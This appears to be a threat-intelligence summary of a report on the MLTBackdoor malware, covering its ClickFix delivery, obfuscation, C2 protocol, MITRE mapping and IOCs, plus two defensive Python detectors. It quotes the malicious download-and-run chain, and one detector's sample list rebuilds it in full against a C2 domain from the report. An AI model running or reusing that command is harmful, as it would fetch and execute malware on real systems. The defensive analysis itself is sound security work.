Technical Analysis of MLTBackdoor

Zscaler ThreatLabz identified MLTBackdoor in May 2026 as a new malware family, likely operated by a ransomware-related threat actor, that is delivered through a multi-stage ClickFix chain and built for post-exploitation with extensible Beacon Object File (BOF) support. It relies on heavy Mixed Boolean-Arithmetic (MBA) and Control Flow Flattening (CFF) obfuscation, API hashing and indirect system calls, a domain generation algorithm alongside hardcoded C2 domains such as hrs2y15sungu[.]com and cwrtwright[.]com, and a custom encrypted protocol over TLS to evade analysis and keep access. #MLTBackdoor #ClickFix #BeaconObjectFiles #hrs2y15sungu[.]com #cwrtwright[.]com

Keypoints

  • ThreatLabz discovered a new malware family called MLTBackdoor in May 2026.
  • The malware is likely tied to ransomware activity and is intended to establish a foothold for lateral movement.
  • Initial delivery used a ClickFix lure on an automotive-related website and executed a staged infection chain.
  • MLTBackdoor is heavily obfuscated with Mixed Boolean-Arithmetic and Control Flow Flattening, plus API hashing and indirect system calls.
  • It includes built-in file and directory commands and a BOF loader to extend functionality dynamically.
  • MLTBackdoor uses a DGA and hardcoded C2 infrastructure to preserve communications if primary servers are unreachable.
  • Its network protocol is custom, encrypted, and disguised to resemble legitimate Microsoft traffic over TLS.

MITRE Techniques

  • [T1059 ] Command and Scripting Interpreter – Used to execute the ClickFix-delivered commands via cmd and run the staged infection chain (‘cmd /c … curl … tar xf … rundll32 …’)
  • [T1105 ] Ingress Tool Transfer – Downloaded the second-stage archive from a remote server (‘curl -skLo … hxxps://hrs2y15sungu[.]com/d’)
  • [T1218.011 ] Signed Binary Proxy Execution: Rundll32 – Used rundll32 to launch the DLL payload (‘rundll32 endpointdlp.dll,#2’)
  • [T1027 ] Obfuscated Files or Information – Heavy MBA and CFF obfuscation, with strings assembled on the stack across a flattened state machine (‘around 95% of its code is just extra, unnecessary calculations’; ‘the string is built across a flattened state machine’)
  • [T1027.007 ] Obfuscated Files or Information: Dynamic API Resolution – Resolved Win32 APIs by hash at runtime instead of importing them (‘resolves everything at runtime’)
  • [T1027.013 ] Obfuscated Files or Information: Encrypted/Encoded File – Shipped the payload as an RC4-encrypted data.bin inside the archive and decrypted it at runtime (‘endpointdlp.dll decrypts the RC4-encrypted data.bin file’)
  • [T1574 ] Hijack Execution Flow – DLL side-loading: a legitimate signed Microsoft Defender executable loaded the malicious DLL (‘sideloads it via a legitimate signed Microsoft Defender mpextms.exe executable’)
  • [T1106 ] Native API – Resolved Win32 APIs, system calls, and BOF symbols at runtime (‘resolves everything at runtime’)
  • [T1021 ] Remote Services – The report states that the backdoor is meant to stage lateral movement; its file upload/download and BOF execution are the building blocks for that, rather than a specific remote service observed in use (‘likely used in ransomware attacks to establish a foothold for lateral movement’)
  • [T1497 ] Virtualization/Sandbox Evasion – Used anti-analysis checks for hypervisors, sandboxes, timing, and debugger detection (‘detect debuggers and sandboxed environments’)
  • [T1480 ] Execution Guardrails – Adjusted behavior based on environment checks and sent anti-analysis flags in initial requests (‘aggregates the results of 10 distinct checks into a bitmask’)
  • [T1036 ] Masquerading – Used Microsoft-like network identifiers and traffic patterns to blend in (‘Microsoft-Delivery-Optimization/10.1’)
  • [T1568.002 ] Dynamic Resolution: Domain Generation Algorithms – Generated daily domains to maintain C2 if servers were unreachable (‘uses a domain generation algorithm’)
  • [T1071.001 ] Application Layer Protocol: Web Protocols – Communicated over TLS on port 443 with a fixed HTTP path to appear legitimate (‘custom encrypted binary protocol over TLS on port 443 with a fixed path (/api/v1/telemetry)’)
  • [T1573.001 ] Encrypted Channel: Symmetric Cryptography – Used AES-256-GCM for session encryption after ECDH key exchange (‘used as an AES-256-GCM session key’)
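The ClickFix chain quoted above (cmd /c ... curl -skLo ... tar xf ... rundll32 ...,#N) is a good fit for process-creation telemetry. The following is an added example, not code from the page or from ThreatLabz, that scores Windows command lines for that chain: it splits the command line into its &&-separated stages, checks curl for insecure download flags and a known IOC domain, tar for extraction, and rundll32 for an ordinal export, and adds weight when the whole download-extract-run chain appears in one command. The indicator weights, the threshold, the sample command lines and the placeholder output file name d.zip (the page elides the real path) are assumptions; the IOC domains and file names are the ones the page lists.

```python
import re
from urllib.parse import urlparse

# Domains and file names quoted on the page. Domains are kept defanged and refanged for matching.
IOC_DOMAINS_DEFANGED = ("hrs2y15sungu[.]com", "cwrtwright[.]com", "carrolc[.]com")
IOC_FILENAMES = ("endpointdlp.dll", "update.zip", "data.bin")

# Indicator weights and the alert threshold are assumed tuning values, not something the page specifies.
WEIGHTS = {
    "curl_download": 1,            # curl writes the response to a file (-o/-O/--output)
    "curl_insecure_tls": 1,        # -k/--insecure disables certificate validation
    "known_ioc_domain": 3,         # URL host matches a domain from the report
    "archive_extract": 1,          # tar x... unpacks the downloaded archive
    "rundll32_ordinal_export": 2,  # rundll32 <dll>,#N runs an export by ordinal
    "known_ioc_filename": 1,       # a file name from the report appears in the command line
    "download_then_rundll32": 2,   # the whole download-extract-run chain in one command line
}
THRESHOLD = 5

CMD_PREFIX_RE = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[cCkK]\s+')
URL_RE = re.compile(r'(?:https?|hxxps?)://[^\s"\']+', re.IGNORECASE)
ORDINAL_RE = re.compile(r',\s*#\d+\b')


def refang(s: str) -> str:
    return s.replace("[.]", ".").replace("hxxp", "http")


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}


def split_stages(cmdline: str) -> list[str]:
    """Drop a leading 'cmd /c' and split the rest on &&, ||, & and |."""
    m = CMD_PREFIX_RE.match(cmdline)
    body = cmdline[m.end():] if m else cmdline
    return [s.strip() for s in re.split(r'\s*(?:&&|\|\||&|\|)\s*', body) if s.strip()]


def stage_exe(stage: str) -> str:
    """Base name of the program a stage runs, without directory or .exe."""
    first = stage.split()[0].strip('"')
    name = first.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def score_event(cmdline: str) -> dict:
    """Score one process command line against the ClickFix chain pattern."""
    hits: list[str] = []
    domain = None

    def add(indicator: str) -> None:
        if indicator not in hits:
            hits.append(indicator)

    for stage in split_stages(cmdline):
        toks = stage.split()
        exe = stage_exe(stage)
        if exe == "curl":
            short = "".join(t[1:] for t in toks[1:] if t.startswith("-") and not t.startswith("--"))
            longs = {t for t in toks[1:] if t.startswith("--")}
            if "o" in short.lower() or "--output" in longs:
                add("curl_download")
            if "k" in short or "--insecure" in longs:
                add("curl_insecure_tls")
            m = URL_RE.search(stage)
            if m:
                domain = (urlparse(refang(m.group(0))).hostname or "").lower()
                if domain in IOC_DOMAINS:
                    add("known_ioc_domain")
        elif exe == "tar" and len(toks) > 1 and "x" in toks[1].lstrip("-"):
            add("archive_extract")
        elif exe == "rundll32" and ORDINAL_RE.search(stage):
            add("rundll32_ordinal_export")
        if any(name in stage.lower() for name in IOC_FILENAMES):
            add("known_ioc_filename")

    if "curl_download" in hits and "rundll32_ordinal_export" in hits:
        add("download_then_rundll32")
    score = sum(WEIGHTS[h] for h in hits)
    return {"score": score, "flagged": score >= THRESHOLD, "indicators": hits, "domain": domain}


# Constructed sample command lines (not from the page). The first reconstructs the quoted chain;
# 'd.zip' stands in for the output path the page elides, and the URL is refanged.
SAMPLE_CMDLINES = [
    "cmd /c curl -skLo d.zip https://hrs2y15sungu.com/d && tar xf d.zip && rundll32 endpointdlp.dll,#2",
    "cmd /c curl -skLo p.zip https://cdn.example.net/p && tar xf p.zip && rundll32 loader.dll,#1",
    "cmd /c curl -sLo out.json https://api.example.com/v1/status",
    "rundll32.exe shell32.dll,Control_RunDLL",
    "cmd /c tar xf backup.tar",
]


def hunt(cmdlines: list[str]) -> list[dict]:
    """Return the scored result, with the command line attached, for every line over the threshold."""
    out = []
    for c in cmdlines:
        r = score_event(c)
        if r["flagged"]:
            out.append({**r, "cmdline": c})
    return out


if __name__ == "__main__":
    for r in hunt(SAMPLE_CMDLINES):
        print(r["score"], r["domain"], r["indicators"])
```

The second sample shows why the chain shape carries more weight than the domain: a variant pointing at a domain not yet in any feed still scores 7, while an ordinary curl download or a normal rundll32 invocation stays well under the threshold.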

Indicators of Compromise

  • [SHA256 ] Stage one loader and related samples – 1e41c7bfaa6aa3b93b6cc024274a10e33f3e12fe7c98c1db387ef8927f9d1984, 46b2155c1e71b840d4b7a2e94410b89a61e2446523e6f497206d402eb02e0e93, and 2 more hashes
  • [SHA256 ] MLTBackdoor binaries and variants – 9e52cc90cff150abe21f0a6440e86e0a99ff383b81061b96def8948e21d0ac66, ced6b0f44410f6133ad63b61e04613a8b56cc3338d7b34497540e9541163e7ec, and 2 more hashes
  • [SHA256 ] Hashes of analysis-tool process names checked by the anti-analysis routine, listed as SHA256 and cracked back to the tool names – 9e8777661a1ad9c983f03060f0a04a3244daac8c3639b3eb1bbce29355bc6c10 (x64dbg.exe), e063358d88290c5d05d58594da341690024cf7fa57408a3874899f10e56d8bc8 (x32dbg.exe), and other cracked process-name hashes
  • [Domain ] DGA and C2 infrastructure – hrs2y15sungu[.]com, cwrtwright[.]com, and carrolc[.]com
  • [URL ] Update delivery location – powwowski[.]com/payloads/update.zip
  • [File names ] Delivered and staged files – data.bin, endpointdlp.dll, and update.zip
  • [Network protocol fields ] Custom packet/header indicators – /api/v1/telemetry, Microsoft-Delivery-Optimization/10.1, and the \x01MLT magic bytes (0x01 followed by ASCII "MLT")
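The network fields above (fixed path, Microsoft-like User-Agent, \x01MLT magic, C2 domains) combine into a proxy-side hunting rule. The following is an added example, not code from the page or from ThreatLabz, that triages HTTP request records against that fingerprint. The key point it encodes: Microsoft-Delivery-Optimization/10.1 is also what genuine Windows Delivery Optimization sends, so the User-Agent alone proves nothing; what matters is that User-Agent reaching a non-Microsoft host, the /api/v1/telemetry path, and, when the proxy terminates TLS, the \x01MLT magic at the start of the body. The Delivery Optimization host allowlist, the weights and thresholds, the sample records and the example.net/example.internal hosts are assumptions; the page gives no header layout beyond the magic, so the sample body after it is zero padding.

```python
from dataclasses import dataclass

# Protocol indicators quoted on the page.
MLT_MAGIC = b"\x01MLT"                                    # leading magic bytes of the custom binary protocol
MLT_PATH = "/api/v1/telemetry"                            # fixed HTTP path used over TLS on 443
MLT_USER_AGENT = "Microsoft-Delivery-Optimization/10.1"   # Microsoft-like User-Agent the backdoor presents
IOC_DOMAINS = {"hrs2y15sungu.com", "cwrtwright.com", "carrolc.com"}  # refanged from the page

# Where genuine Delivery Optimization traffic goes. Assumed allowlist; tune it to your environment.
DO_HOST_SUFFIXES = (".delivery.mp.microsoft.com", ".windowsupdate.com")

# Reason weights and severity thresholds are assumed tuning values, not something the page specifies.
WEIGHTS = {
    "ioc_domain": 3,                   # destination is a domain from the report
    "mlt_magic": 3,                    # request body starts with \x01MLT (needs TLS inspection)
    "do_user_agent_off_microsoft": 2,  # DO User-Agent sent to a non-Microsoft host
    "telemetry_path_with_do_ua": 2,    # DO User-Agent combined with the fixed backdoor path
}


@dataclass
class HttpRecord:
    host: str           # TLS SNI / Host header as seen by the proxy
    port: int
    path: str
    user_agent: str
    body_prefix: bytes  # first bytes of the request body; empty when the proxy cannot see inside TLS


def triage(rec: HttpRecord) -> dict:
    """Score one request against the MLTBackdoor network fingerprint."""
    reasons = []
    host = rec.host.lower()
    ua_is_do = rec.user_agent == MLT_USER_AGENT
    if host in IOC_DOMAINS:
        reasons.append("ioc_domain")
    if rec.body_prefix.startswith(MLT_MAGIC):
        reasons.append("mlt_magic")
    if ua_is_do and not host.endswith(DO_HOST_SUFFIXES):
        reasons.append("do_user_agent_off_microsoft")
    if ua_is_do and rec.path == MLT_PATH:
        reasons.append("telemetry_path_with_do_ua")
    score = sum(WEIGHTS[r] for r in reasons)
    severity = "high" if score >= 4 else "medium" if score >= 2 else "none"
    return {"host": host, "port": rec.port, "score": score, "severity": severity, "reasons": reasons}


def hunt(records) -> list[dict]:
    """Return every triaged record that scored at least medium."""
    return [t for t in (triage(r) for r in records) if t["severity"] != "none"]


# Constructed sample records (not from the page); example.net / example.internal hosts are placeholders.
SAMPLE_RECORDS = [
    # genuine Delivery Optimization download: same User-Agent, Microsoft host, unrelated path
    HttpRecord("dl.delivery.mp.microsoft.com", 443, "/filestreamingservice/files/abc", MLT_USER_AGENT, b""),
    # beacon to a C2 domain from the report, body visible because the proxy terminates TLS
    HttpRecord("cwrtwright.com", 443, MLT_PATH, MLT_USER_AGENT, MLT_MAGIC + b"\x00" * 12),
    # same shape to an unknown (DGA-style) host with no body visibility
    HttpRecord("k3v9qzx.example.net", 443, MLT_PATH, MLT_USER_AGENT, b""),
    # internal app that happens to expose a /api/v1/telemetry route, browser User-Agent
    HttpRecord("app.example.internal", 443, MLT_PATH, "Mozilla/5.0", b""),
    # DO User-Agent to an internal update server: worth a look, but no path match
    HttpRecord("wsus.example.internal", 8530, "/Content/AB/x.cab", MLT_USER_AGENT, b""),
]


if __name__ == "__main__":
    for t in hunt(SAMPLE_RECORDS):
        print(t["severity"], t["host"], t["reasons"])
```

The third sample is the one to watch: a DGA-generated domain will not be in any IOC list and the body is invisible without TLS interception, yet the User-Agent plus path combination still reaches high severity. The last sample is the tuning case; Delivery Optimization peers and internal update servers legitimately receive that User-Agent, so an allowlist of known destinations keeps the medium-severity noise down.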


Read more: https://www.zscaler.com/blogs/security-research/technical-analysis-mltbackdoor